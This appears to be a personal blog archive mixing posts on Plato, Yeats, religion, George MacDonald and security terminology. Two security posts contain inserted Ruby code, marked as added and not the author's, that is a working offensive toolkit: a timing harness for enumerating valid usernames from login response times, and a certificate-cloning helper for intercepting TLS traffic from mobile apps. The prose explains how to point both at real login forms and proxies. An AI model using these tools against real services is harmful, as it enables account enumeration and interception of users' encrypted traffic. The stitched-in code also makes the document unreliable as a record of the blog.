My good friend Felix and I had a lengthy theological discussion on Saturday evening. It was so lengthy and rather complex that I have two pages of notes, thoughts and points for further research that I quickly wrote down after …
A week before the new year arrived I set about creating the ever-famous list of resolutions. Each year, though, instead of the list becoming a recipe for failure, it becomes something that just might be achievable with the right balance. Well, this year (2011) one of the items on my list is to spend some serious time with Plato’s dialogues. No, not all of them. There are about 7 dialogues in my list. It has a heavy emphasis on the early dialogues according to this site. Many of the dialogues I’ve read in the past and have even been the subject of a blog post or two. I’ll be attempting to extract from the dialogues Plato’s central themes, his philosophy as it develops and his methods. I’ll be using R.E. Allen’s translations instead of the collection of dialogues from my small Loeb library. My aim *here* is to write about some of the observations I’ve made and my general musings. I’m writing to chronicle my brief journey for future reference.
The dialogues I’ll be reading:
Apology, Euthydemus, Euthyphro, Gorgias
Over the past several weeks a colleague and I have embarked on a mission that is probably akin to finding a sea route to the Indies in the 15th century. We call it a security ontology. I think this is a decent label. Since we’ve been trying to redefine and/or correct some of the old-school security maxims and practices for the past 4 years or so, we thought: what better way than to revisit terminology? We could place that terminology within its semantic domain and, most importantly, map the relationships between these terms. In the end, we could all speak a similar language and sort of create our own linguistic community. It’s almost an experiment in more ways than one. Security terminology has always been an organic evolution. Hutton and Mortman would call this anarchy. I don’t know if I’d go *that* far, but it does catch the eye. So far, this project has gotten us through an information system model (necessary since that is usually an object of desire in most cases), typical vulnerability, adversary and attack language, and now we’re right in the middle of everyone’s favorite, risk. Hopefully we’re not stuck in the Bermuda Triangle for too long. One of the primary epistemological measurements (or epistemic justification) that we’ll be using to determine if it “works” is coherence, or, how well do the individual pieces connect together to form a system of knowledge. Yes, it has its flaws, but I think this is a good first step. Anyone else working on something like this?
So, I’ve written some Ruby classes that interact with a web application that provides web service-like functions. One of the “interesting” features it provides is authentication. Having created the Ruby API to authenticate users I now want to try to use timing attacks to enumerate valid usernames. Unfortunately, I have not been able to find anything that fills this role. There is Benchmark, but it is more focused on CPU-like measurements. I’d like a tool that is focused on measuring time between HTTP requests and responses and makes adjustments for any overhead associated with Ruby itself.
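A sketch of the measurement side of such a tool, added here as an example (it is not the author's Ruby API, and no real login endpoint is involved). The target is a block so the code runs offline; the `FAKE_LOGIN` lambda and its 20 ms delay for existing accounts are constructed stand-ins for a server that hashes the password only when the username exists. The harness reads the monotonic clock, interleaves candidates across sampling rounds so a transient slowdown cannot masquerade as a signal, takes the median per name, subtracts its own dispatch overhead, and only reports a split when the gap between clusters clears a threshold.

```ruby
# Added example: a wall-clock timing harness for enumerating usernames through
# a response-time side channel. Not the author's tool; the "request" is a block
# so that everything here runs offline.
class TimingProbe
  def initialize(samples: 9)
    @samples = samples
  end

  # Duration of one invocation, taken from the monotonic clock so that wall
  # clock adjustments cannot skew a sample.
  def time_once
    t0 = Process.clock_gettime(Process::CLOCK_MONOTONIC)
    yield
    Process.clock_gettime(Process::CLOCK_MONOTONIC) - t0
  end

  # Median of repeated samples of one block: robust to the occasional GC pause
  # or network hiccup that would dominate a mean.
  def measure(&blk)
    TimingProbe.median(Array.new(@samples) { time_once(&blk) })
  end

  # Cost of the harness itself (block dispatch plus two clock reads), measured
  # against an empty block and subtracted from every real measurement.
  def overhead
    @overhead ||= measure { nil }
  end

  # name => seconds above harness overhead. Candidates are probed round-robin,
  # so each round sees the same network conditions for every name.
  # The block receives a username and performs one login attempt with it.
  def profile(candidates)
    samples = Hash.new { |h, k| h[k] = [] }
    @samples.times do
      candidates.each { |name| samples[name] << time_once { yield name } }
    end
    samples.transform_values { |d| [TimingProbe.median(d) - overhead, 0.0].max }
  end

  def self.median(values)
    sorted = values.sort
    mid = sorted.length / 2
    sorted.length.odd? ? sorted[mid] : (sorted[mid - 1] + sorted[mid]) / 2.0
  end

  # Partition names around the single largest gap in the sorted timings. The
  # slow cluster is where the server did extra work (typically hashing a
  # password for an account that exists). If no gap reaches min_gap the
  # signal is indistinguishable from noise and nothing is reported as valid.
  # Returns [likely_valid, likely_invalid].
  def self.split(profile, min_gap: 0.005)
    sorted = profile.sort_by { |_, secs| secs }
    return [[], sorted.map(&:first)] if sorted.length < 2
    gaps = sorted.each_cons(2).map { |(_, a), (_, b)| b - a }
    widest, idx = gaps.each_with_index.max_by { |gap, _| gap }
    return [[], sorted.map(&:first)] if widest < min_gap
    [sorted[(idx + 1)..-1].map(&:first), sorted[0..idx].map(&:first)]
  end
end

# Constructed stand-in for the web application (assumed behaviour): an account
# that exists pays for a password hash before the rejection; an unknown
# account is rejected at once.
FAKE_VALID_USERS = %w[alice bob].freeze
FAKE_LOGIN = ->(user) { sleep(FAKE_VALID_USERS.include?(user) ? 0.02 : 0) }

if __FILE__ == $PROGRAM_NAME
  timings = TimingProbe.new(samples: 7).profile(%w[alice carol bob dave], &FAKE_LOGIN)
  valid, invalid = TimingProbe.split(timings)
  puts "likely valid: #{valid.inspect}, likely invalid: #{invalid.inspect}"
end
```

Against a real application the block would wrap the authentication call (for instance a `Net::HTTP` POST to the login form with a fixed bogus password), and the `samples` count would go up until the two clusters stop moving between runs; on a noisy link the largest-gap heuristic reports nothing rather than guessing, which is the behaviour you want from an enumeration tool.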
In my struggle to meet the demands of my now long forgotten, but now remembered, resolutions of the New Year I read Adam’s Curse by W.B. Yeats last night. Some of the stanzas I have faint memories of. If I can dare to do so I’d say that this poem summarizes nicely what I tell my children; doing things that are worthwhile takes serious time and effort. Yeats, I think, agrees. Poetry, beauty and love all take work. I should correct myself here. If you are successful, the recipient of your effort should scarcely notice the labor. This is one of the signs of its quality according to Yeats; the quality of seeming like “a moment’s thought”.
Sadly, and I get this sense near the end, we’ve lost the motivation to pursue this sort of quality. Or we invent new ways that short-circuit some of that time and effort. Maybe when we do this, we lose some of the personal benefits of this exertion?
We sat together at one summer’s end,
That beautiful mild woman, your close friend,
And you and I, and talked of poetry.
I said, “A line will take us hours maybe;
Yet if it does not seem a moment’s thought,
Our stitching and unstitching has been naught.
Better go down upon your marrow-bones
And scrub a kitchen pavement, or break stones
Like an old pauper, in all kinds of weather;
For to articulate sweet sounds together
Is to work harder than all these, and yet
Be thought an idler by the noisy set
Of bankers, schoolmasters, and clergymen
The martyrs call the world.”
That beautiful mild woman for whose sake
There’s many a one shall find out all heartache
On finding that her voice is sweet and low
Replied, “To be born woman is to know –
Although they do not talk of it at school –
That we must labour to be beautiful.”
I said, “It’s certain there is no fine thing
Since Adam’s fall but needs much labouring.
There have been lovers who thought love should be
So much compounded of high courtesy
That they would sigh and quote with learned looks
Precedents out of beautiful old books;
Yet now it seems an idle trade enough.”
We sat grown quiet at the name of love;
We saw the last embers of daylight die,
And in the trembling blue-green of the sky
A moon, worn as if it had been a shell
Washed by time’s waters as they rose and fell
About the stars and broke in days and years.
I had a thought for no one’s but your ears:
That you were beautiful, and that I strove
To love you in the old high way of love;
That it had all seemed happy, and yet we’d grown
As weary-hearted as that hollow moon.
Since I don’t blog nearly enough, I figured I’d at least use this as a dumping ground for all the lame ideas I have for tools that would have made my life easier. The first tool, or the most recent tool that would have saved some time, is the ssl-cert-spoofer-helper. Can you see that I’m not very creative? In my experience, especially with the iPhone, you not only need a trusted CA certificate on your iPhone, but a server certificate that looks *almost* like what the iPhone application is expecting. Specifically, the CN has to match the original. So, rather than go through the trouble of grabbing the “real” server certificate, examining it, and using openssl to generate my CA and fake certificate, I would like a tool that does it all for me. I started working on one in Ruby, but it isn’t terribly interesting OR fun….at all.
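The certificate-minting half of that tool, written here as an added example with Ruby's bundled OpenSSL binding (it is not the author's unfinished code). It builds a lab CA, then a leaf certificate that copies the original's subject verbatim (so the CN matches) and carries over its subjectAltName, because hostname checks consult the SAN before the CN. The `demo_original` certificate is a constructed stand-in for the real server certificate; in practice that object comes back from `OpenSSL::SSL::SSLSocket#peer_cert` after a handshake with the real host. `CertSpoofHelper`, `accepted_by_client?` and the `api.example.com` name are this example's own.

```ruby
require 'openssl'
require 'securerandom'

# Added example (not the author's tool): mint a CA and a leaf certificate
# that clones a server certificate's subject and SAN, signed by that CA.
module CertSpoofHelper
  module_function

  ONE_YEAR = 365 * 24 * 3600

  def random_serial
    SecureRandom.random_number(1 << 63) + 1 # positive; unique enough for a lab CA
  end

  # Self-signed CA that the test device will be told to trust.
  def make_ca(cn: 'Spoof Test CA', key_bits: 2048)
    key  = OpenSSL::PKey::RSA.new(key_bits)
    cert = OpenSSL::X509::Certificate.new
    cert.version    = 2 # X.509v3, needed for extensions
    cert.serial     = random_serial
    cert.subject    = OpenSSL::X509::Name.parse("/CN=#{cn}")
    cert.issuer     = cert.subject
    cert.public_key = key.public_key
    cert.not_before = Time.now - 60
    cert.not_after  = Time.now + ONE_YEAR
    ef = OpenSSL::X509::ExtensionFactory.new
    ef.subject_certificate = cert
    ef.issuer_certificate  = cert
    cert.add_extension(ef.create_extension('basicConstraints', 'CA:TRUE', true))
    cert.add_extension(ef.create_extension('keyUsage', 'keyCertSign, cRLSign', true))
    cert.add_extension(ef.create_extension('subjectKeyIdentifier', 'hash'))
    cert.sign(key, OpenSSL::Digest.new('SHA256'))
    [cert, key]
  end

  # Leaf with the original's subject and SAN, issued by our CA, on our key.
  def clone_leaf(original, ca_cert, ca_key, key_bits: 2048)
    key  = OpenSSL::PKey::RSA.new(key_bits)
    cert = OpenSSL::X509::Certificate.new
    cert.version    = 2
    cert.serial     = random_serial
    cert.subject    = original.subject # CN (and O, C, ...) copied verbatim
    cert.issuer     = ca_cert.subject
    cert.public_key = key.public_key
    cert.not_before = Time.now - 60
    cert.not_after  = Time.now + ONE_YEAR
    ef = OpenSSL::X509::ExtensionFactory.new
    ef.subject_certificate = cert
    ef.issuer_certificate  = ca_cert
    cert.add_extension(ef.create_extension('basicConstraints', 'CA:FALSE', true))
    cert.add_extension(ef.create_extension('keyUsage', 'digitalSignature, keyEncipherment', true))
    cert.add_extension(ef.create_extension('extendedKeyUsage', 'serverAuth'))
    cert.add_extension(ef.create_extension('authorityKeyIdentifier', 'keyid:always'))
    # Hostname verification looks at subjectAltName first, so carry it over as-is.
    san = original.extensions.find { |e| e.oid == 'subjectAltName' }
    cert.add_extension(san) if san
    cert.sign(ca_key, OpenSSL::Digest.new('SHA256'))
    [cert, key]
  end

  def cn(cert)
    entry = cert.subject.to_a.find { |oid, _value, _type| oid == 'CN' }
    entry && entry[1]
  end

  # What a client checks once our CA is installed: chain, then hostname.
  def accepted_by_client?(leaf, ca_cert, hostname)
    store = OpenSSL::X509::Store.new
    store.add_cert(ca_cert)
    store.verify(leaf) && OpenSSL::SSL.verify_certificate_identity(leaf, hostname)
  end

  # Constructed stand-in for the "real" server certificate; in practice this
  # is what OpenSSL::SSL::SSLSocket#peer_cert returns after a handshake.
  def demo_original(cn: 'api.example.com')
    key  = OpenSSL::PKey::RSA.new(2048)
    cert = OpenSSL::X509::Certificate.new
    cert.version    = 2
    cert.serial     = random_serial
    cert.subject    = OpenSSL::X509::Name.parse("/C=US/O=Example Corp/CN=#{cn}")
    cert.issuer     = cert.subject
    cert.public_key = key.public_key
    cert.not_before = Time.now - 60
    cert.not_after  = Time.now + ONE_YEAR
    ef = OpenSSL::X509::ExtensionFactory.new
    ef.subject_certificate = cert
    ef.issuer_certificate  = cert
    cert.add_extension(ef.create_extension('subjectAltName', "DNS:#{cn}"))
    cert.sign(key, OpenSSL::Digest.new('SHA256'))
    cert
  end
end
```

Write the CA out with `ca.to_pem` for installation on the device, and hand the leaf plus its key to whatever intercepting proxy terminates TLS. The check worth keeping from this example is `accepted_by_client?`: an app that pins the server key or validates more than chain and hostname will still refuse the clone, and it is cheaper to learn that from the harness than from a failed interception.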
Wow, has it really been a month since my last post? It certainly isn’t because I don’t have anything on my mind. It is a time/motivation thing. So, since I am writing now I must have something worthwhile to say? Maybe.
I’ve had several conversations over the past couple of years about religion. Yes, probably more than several. In particular though, these conversations centered around the most pure, earliest, oldest or the most correct form of a given religion. There is a continuing effort, it seems to me, by people of all religions to try to “get back to the roots” of their respective religions. It is as if they are saying that the current forms are somehow deficient. I find this fascinating.
Obviously, over time religions “evolve”. As people and cultures change, religious expression and understanding also undergo changes of their own. But, when people become unsatisfied by current religious forms, what are they trying to recover by going back in time? I would venture a guess that there is some connection in their minds between time and accuracy. The older the religious practice, the more pure (read: correct) it must be. Naturally, if this is our position, one would look to the oldest practices to find solace in their religion. But doesn’t this make a fatal mistake? Doesn’t it elevate the people of the past into positions that they themselves would not lay claim to? Namely, that they alone understood what the correct religion looked like or that they were less likely to make errors of judgment? I don’t think the devout peoples in antiquity would touch that with a 10-foot pole.
This grows more acute when there are religious figures in the mix. Even if these religious figures are elevated to some perfection because of some innate power, does it follow that emulating their religious practices would lead one to the correct understanding and practices of a religion? Doesn’t this commit the same error? It removes the figures from their historical setting. If they are a part of history, then aren’t they also constrained in some ways by space and time? I think there is a sort of reverse chronological snobbery at play here. Anything “old” is good, anything “new” is bad. Or, maybe, “the older the better”.
Why were the ancient caretakers of religion any more or less human, imperfect or prone to error than us? I don’t think they were any of those things. I think it is more a modern phenomenon. Maybe it is a means to preserve and connect with a larger community. Maybe the current religious experiences are devoid of any real content, meaning or force. But is the answer to this that we revert back to 2500 year old practices? I don’t think so.
Contrary to my expectations, Lilith by George MacDonald is a tough slog. I’m not sure why. Maybe I was expecting something more like The Princess and the Goblin. It seems as though Lilith is really a message with a story as a background rather than a story with a message in the background. I’m sure it is just my lack of sophistication. Despite this, MacDonald manages to transmit quite a few profound ideas to the attentive reader.
“These words are too big for you and me: all is one of them, and ever is another,” said a voice near me which I knew.
George MacDonald, Lilith, p.93
Ahh, such sweet music to my epistemological senses, however distorted they may be. Yes, there is little context to go on here, but it does speak for itself doesn’t it? All and ever are rarely epistemologically admissible and yet easily used in our everyday speech. Who has such authority to lay claim to all and ever? Is it you and I?
“Doubt”, I said to myself, “may be a poor encouragement to do anything, but it is a bad reason for doing nothing.”
George MacDonald, Lilith, p.97
Classic. Do I need to elaborate?
The classic CIA Triad (Confidentiality, Integrity and Availability) as it is affectionately called has been used for decades as a means to coarsely outline certain security/assurance expectations of a system. It has lasted this long because who can forget a TLA? Sadly, it is too general to be used effectively in most application security endeavors. There have been many who have attempted to elaborate on the triad to make it more useful. Microsoft’s Security Frame was a great effort. It identified the important and relevant categories that were hidden away within the triad. However, going from a TLA to a set of ten concepts or IAACSSCEA isn’t exactly easy to recall. Yes, I know, this should be documented as part of a defined process chock full of cheat sheets, tips and lists. Well, in an effort to align these concepts with my view of security functions and properties I created a set of six concepts that are derived from CIA, but that add more precision. You’ll probably recognize some of these labels. Yes, some of them made sense to retain from Microsoft’s Frame, others were useful labels gathered from the Common Criteria (oh no! not that!?). So, I managed to trim a few items by merging them with a more common category. Let’s see if an uninformed reader can make sense of these:
- Accountability and Event Reconstruction
- Data Protection
- Identity and Access Management
- Exception Management and Availability
- Management and Configuration
Identity and Access Management is perhaps the most intuitive category. It encompasses authentication, authorization and other concepts related to access control. Accountability is also fairly straightforward. What is your take on the others?
So, I’m reading Without Roots, by Pera and Ratzinger and stumbled across a sentence I cannot help but respond to.
…dialogue cannot be an instrument for the discovery of truth, because Revelation plays that role. In other words, in Christianity truth is not a process, but a state, not a becoming but a being.
– Marcello Pera, Without Roots, p.28
Having never read anything by Pera in the past, I don’t have any real reference point to infer what he may be getting at. Reading this sentence as it stands however, I have to take issue. Even if we grant that Revelation is a valid source of knowledge, it does not follow that we, without the aid of our reason, can understand unequivocally, through whatever medium this revelatory knowledge is delivered, these truths. In other words, there will always be a human mind receiving data. If this is so, then we have all of the baggage that goes along with the human receiver. Time, place, language, culture, religion, all of this will undoubtedly influence the receiver’s interpretation of data. To presume that we are a blank slate capable of receiving data, delivered in most cases within a historical context, exactly as a divine authority intended it is quite amusing. From what I’ve read so far, I don’t think Pera intends this, but I can’t be sure. This objective truth that Pera refers to may be a state, but human minds still have to go through a process of apprehension. This process, as history has no doubt proven, is always a challenge to get right. Furthermore, how do we know when we have received the *truth* and not falsehood? Which measurements do we use? Here, we fall back again upon time, place, language and culture. We judge this truth based on our current criteria for truth. So, if Revelation is a valid source of knowledge, we have to answer in a very real way how we gain access to that knowledge when it is encased in anthropological dressing.
What smites us with unquenchable amazement is not that which we grasp and are able to convey but that which lies within our reach but beyond our grasp; not the quantitative aspect of nature but something qualitative; not what is beyond our range of time and space but the true meaning, source and end of being, in other words, the ineffable.
– Abraham Joshua Heschel, Man is Not Alone, p.4
Many times we experience things we do not fully understand and cannot begin to adequately articulate. It is as if something has grasped us as we struggle in search of meaning or something bigger than ourselves. Sometimes we are grasped even when we are not searching. Heschel comes very close, I think, to explaining this sort of experience. To those that are fortunate enough to share in such an encounter, Heschel’s words need little explanation. Nature’s mysteries sometimes draw us into this mystery of causes. Who or what is this mystery that we sometimes glimpse however dimly? What is it that we feel kinship with in those mundane and extraordinary of times? Is it imagination or wishful expectation or something much, much greater?